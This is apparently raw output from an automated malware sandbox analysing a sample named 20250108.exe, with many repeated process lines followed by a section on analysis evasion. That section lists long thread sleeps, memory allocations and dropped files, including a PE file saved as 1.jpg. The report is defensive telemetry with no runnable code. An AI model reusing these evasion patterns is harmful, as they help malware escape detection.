          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\regedit.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Downloads\????\?????\20250108.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 2860BB70000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 28625640000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 1AB9A940000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 1ABB4280000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 20CB7700000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 20CD1230000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 1F730440000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: 1F749F90000 memory reserve | memory write watch
          Source: C:\Users\user\Downloads\????\?????\20250108.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Downloads\????\?????\20250108.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Downloads\????\?????\20250108.exeWindow / User API: threadDelayed 371
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8047
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1806
          Source: C:\Users\user\Downloads\????\?????\20250108.exeWindow / User API: threadDelayed 1257
          Source: C:\Users\user\Downloads\????\?????\20250108.exeWindow / User API: threadDelayed 2006
          Source: C:\Users\user\Downloads\????\?????\20250108.exeWindow / User API: threadDelayed 3359
          Source: C:\Users\user\Downloads\????\?????\20250108.exeWindow / User API: threadDelayed 5446
          Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Downloads\?????\20250108.exeJump to dropped file
          Source: C:\Program Files\7-Zip\7zG.exeDropped PE file which has not been started: C:\Users\user\Downloads\?????\l.dllJump to dropped file
          Source: C:\Users\user\Downloads\????\?????\20250108.exeDropped PE file which has not been started: C:\Users\Public\Documents\1.jpgJump to dropped file
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6908Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 6796Thread sleep count: 266 > 30
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960Thread sleep count: 371 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep count: 8047 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep count: 1806 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1904Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960Thread sleep count: 1257 > 30
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960Thread sleep count: 2006 > 30
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960Thread sleep count: 3359 > 30
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 1960Thread sleep time: -33590s >= -30000s
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 364Thread sleep count: 5446 > 30
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 364Thread sleep time: -5446000s >= -30000s
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 4828Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Downloads\????\?????\20250108.exe TID: 6184Thread sleep count: 238 > 30
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Downloads\????\?????\20250108.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
          Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
          Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
